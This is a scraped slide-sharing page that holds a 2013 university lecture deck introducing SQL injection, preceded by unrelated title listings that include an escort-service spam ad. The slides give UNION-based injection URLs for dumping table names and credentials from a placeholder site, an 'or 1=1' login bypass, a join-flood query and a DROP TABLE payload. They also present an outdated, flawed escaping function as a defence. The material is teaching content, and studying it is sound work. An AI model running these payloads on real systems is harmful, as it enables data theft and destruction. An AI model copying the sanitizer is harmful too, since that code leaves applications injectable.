Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdfEnzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its Characteristics
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media Component
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
Staff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSDStaff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSD
 

A Brief Introduction in SQL Injection

  • 1. Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
  • 2. • Introduction • Why SQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
  • 3. We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
  • 4.
  • 5.  SQL Injection may happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
  • 6.  Simple example:  Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
  • 7.  www.yourtarget.com/list?id=5  if you want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
  • 8.  The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
  • 9.  Finding the URL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
  • 10.  Now its time to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
  • 11.  And Finally its time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
  • 12.  Now we can Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
  • 13. If user_list contains 1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
  • 14. Insert newuser into tbl_user The maliciouse code can be : DROP table tbl_user
  • 15.  How it works Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
  • 16.  Security is the developer’s job  No database, connector, or framework can prevent SQL injection all the time
  • 17. • Implement proper Error Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
  • 18. <?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
  • 19. Vipin Samar, Oracle vice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
  • 20.  Using Stroprocedures: CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
  • 21.  I don’t have to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
  • 22. NoSQL databases are immune to SQL injection.

Editor's Notes

  1. Tables have relation with each other . Inserting the row in tables with unauthorized access